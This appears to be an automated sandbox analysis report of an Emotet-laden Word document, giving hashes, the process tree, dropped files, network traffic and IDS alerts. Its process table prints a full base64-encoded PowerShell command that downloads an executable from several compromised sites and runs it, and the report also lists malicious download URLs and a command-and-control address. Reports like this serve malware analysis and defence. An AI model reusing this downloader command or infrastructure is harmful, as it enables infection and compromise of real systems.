File name: | b4640705afb53530f51f.zip |
Full analysis: | https://app.any.run/tasks/5ce6d2d9-c04b-432f-9e44-ed4958fc2c7f |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | September 18, 2019, 16:11:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C0FDA27A6ACC1432971C7322DDCCF53D |
SHA1: | 58F8DE8B6531ACF63F8673FEB611E0B8D51DC21E |
SHA256: | 3BB3F51C6389095A28D24CAE5612B884D6908A6C2B96FAFFCAF6191CBAB7F285 |
SSDEEP: | 3072:pAN+LZWyZZq67yNcBIQhMZcYpkHFVboOUqdKJduFJVF6k7ikO:GktJprBnuLOwqoJduFjF64O |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 788 |
---|---|
ZipBitFlag: | 0x0001 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:09:18 16:09:15 |
ZipCRC: | 0x57bb7eb8 |
ZipCompressedSize: | 148558 |
ZipUncompressedSize: | 268992 |
ZipFileName: | b4640705afb53530f51f23f931c0f35592c456e897f5858c48587682d78082cc.bin |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2888 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\b4640705afb53530f51f.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2944 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\b4640705afb53530f51f23f931c0f35592c456e897f5858c48587682d78082cc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2860 | powershell -encod JABEAEkAaQBNAE0AdwBkAFAAPQAnAHAAdwA3ADkAVQBWADUATgAnADsAJAByADgAOQBCAHEAdgA5AE0AIAA9ACAAJwA1ADIAMwAnADsAJAB6ADEAbwBaAGkARABqAD0AJwBPAGwAXwBxAG0ARQBDACcAOwAkAEwAagA2AEoAbABMAEgAegA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAcgA4ADkAQgBxAHYAOQBNACsAJwAuAGUAeABlACcAOwAkAHEAdAA0AEUAbgA2AEQAQgA9ACcAUgAzAHYAcQBpAFMARgBUACcAOwAkAEMAaQBJAEwAawBIAFUAbwA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAYgBDAEwASQBFAE4AdAA7ACQAcQBXAEcAXwBqAHoAWgBWAD0AJwBoAHQAdABwADoALwAvAHMAaABhAGUAbAAuAG8AcgBnAC8AaABvAHMAdABpAG4AZwAvAFQAWQBYAGMAaABjAEsAawBIAHoALwBAAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBsAG8AdAB0AGkAegB6AGEAegBpAG8AbgBlAHMAYQB2AGEAcgByAGEALgBpAHQALwB3AHAALQBhAGQAbQBpAG4ALwB6AE0AaQBmAFoARABQAHUAcgAvAEAAaAB0AHQAcABzADoALwAvAGgAZQByAHIAZQBuAG0AbwBkAGUALgB0AGsALwA1AHUAcwBxAGoAbABlAHcALwB0AHQAZwAyADIAegBjAGYAXwBxADUAYwBoAG8AdgAtADMANwA3ADIAMQA1AC8AQABoAHQAdABwADoALwAvAG4AZgBiAGkAbwAuAGMAbwBtAC8AaQBtAGcALwB1AHAAbABvAGEAZABfAEkAbQBhAGcAZQAvAGUAZABtAC8AcABpAGMAXwAyAC8AdQA2AHEANAB1AGMAcQA3AF8AaAB5AGcAOAB1AHoAaABoAC0AMwA2ADkAOQA2ADMANQA1ADkALwBAAGgAdAB0AHAAOgAvAC8AZQBuAGQAbwBmAGgAaQBzAHIAbwBwAGUALgBuAGUAdAAvADIAMAAwADgALQAwADgAXwBQAFMAQgBlAGEAcgBEAG8AbgBhAHQAZQAvAHEAbQBpAHUATwBaAHYARABqAC8AJwAuACIAUwBwAGAATABpAFQAIgAoACcAQAAnACkAOwAkAGwAdAA1AHIARQBwAE0AegA9ACcATgBUAE0AUABzAEYAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQQBrAE8AWgBQAHoAVwAgAGkAbgAgACQAcQBXAEcAXwBqAHoAWgBWACkAewB0AHIAeQB7ACQAQwBpAEkATABrAEgAVQBvAC4AIgBkAE8AYAB3AGAATgBsAGAAbwBBAGQAZgBpAGwAZQAiACgAJABBAGsATwBaAFAAegBXACwAIAAkAEwAagA2AEoAbABMAEgAegApADsAJABsAFcAZABEADQATwA9ACcAdgBiAFgAaAB3AE0ANgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0AJwArACcASQAnACsAJwB0AGUAbQAnACkAIAAkAEwAagA2AEoAbABMAEgAegApAC4AIgBMAGAAZQBOAGcAVABIACIAIAAtAGcAZQAgADIANAA4ADEANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYQBgAFIAdAAiACgAJABMAGoANgBKAGwATABIAHoAKQA7ACQASwBfADAAdABRAHcAbwBiAD0AJwBhADkAZAB2AEsARwBHAGIAJwA7AGIAcgBlAGEAawA7ACQAQgBjAFIASABSAFYANAA9ACcARgBTAEEAbQBSAFYANgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABFAHIAWgBjAE4ASAA9ACcAdwBuAFcAcQBGAGQAXwBhACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2668 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | powershell.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3932 | "C:\Users\admin\523.exe" | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
4044 | --d05e77b4 | C:\Users\admin\523.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2948 | --d05e77b4 | C:\Users\admin\523.exe | 523.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2432 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 523.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
2344 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
3520 | --fd47f3b8 | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
User: admin Integrity Level: MEDIUM Exit code: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2888 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2888.11440\b4640705afb53530f51f23f931c0f35592c456e897f5858c48587682d78082cc.bin | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE39E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\97E50BCA.wmf | wmf | |
MD5:EDD0A083B87F692A2A53AEC42D976965 | SHA256:4BF9EF4178CCC1B084B7FB0BB129B5FB45DD8E73F4223057940154E71E869438 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B9AB196432134494F9B7730724875DEA | SHA256:A252B01F083E2F0E4F2527B11D9E86FB86EAD73694FD636B87C5237ED198CA26 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\b4640705afb53530f51f23f931c0f35592c456e897f5858c48587682d78082cc.doc.LNK | lnk | |
MD5:88DD01E514111E065C96E982187E10CF | SHA256:2AC8D0ECFD16940919EDF80BD4C7287EB59112DC6CE1EAC7815624EC5EA79B14 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2973C0B6.wmf | wmf | |
MD5:6EFFCC26171538B9841CE3FE767DAF90 | SHA256:82DF4460B3B744DEC1612B033BA19FC7F0E8260AFB9BED3E4D60AFDE16C19F95 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7DC680CE.wmf | wmf | |
MD5:4071AABD234CD627E96C7CE79FF3A320 | SHA256:75FA43CC00AD2E4C82A29EB15B5C8E9EAF7D872C7C36229E3C01133D81ED44FB | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | text | |
MD5:84D30A87B3896F30B22D105775DBC207 | SHA256:9BB3251FA34929C3B21C39ADCE097468EB79860BBCFAF3E338B132DC8FB46E8B | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4E303CC0.wmf | wmf | |
MD5:1B29CE61C41C6938897D5BD387BEE314 | SHA256:34107EDCB28D7547CC3E0105A3F8CADC7A6B0088E868668F7DB9900A536E1BE1 | |||
2944 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D2F29AD.wmf | wmf | |
MD5:C79FAE111514EF6C44BC483F2FCAF326 | SHA256:24359103CAF24FE170B841F760CCA155AB6E95DC34FBF8C59A1B93509FC8E2A3 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2860 | powershell.exe | GET | 200 | 156.67.209.58:80 | http://shael.org/cgi-sys/suspendedpage.cgi | SG | html | 7.40 Kb | malicious |
2860 | powershell.exe | GET | 200 | 89.46.105.48:80 | http://www.lottizzazionesavarra.it/wp-admin/zMifZDPur/ | IT | executable | 404 Kb | suspicious |
2316 | easywindow.exe | POST | — | 91.92.191.134:8080 | http://91.92.191.134:8080/tlb/publish/ringin/merge/ | IR | — | — | malicious |
2860 | powershell.exe | GET | 302 | 156.67.209.58:80 | http://shael.org/hosting/TYXchcKkHz/ | SG | html | 681 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2316 | easywindow.exe | 91.92.191.134:8080 | — | Information Technology Company (ITC) | IR | malicious |
2860 | powershell.exe | 156.67.209.58:80 | shael.org | Hostinger International Limited | SG | unknown |
2860 | powershell.exe | 89.46.105.48:80 | www.lottizzazionesavarra.it | Aruba S.p.A. | IT | suspicious |
Domain | IP | Reputation |
---|---|---|
shael.org |
| malicious |
www.lottizzazionesavarra.it |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2860 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2860 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2860 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2860 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |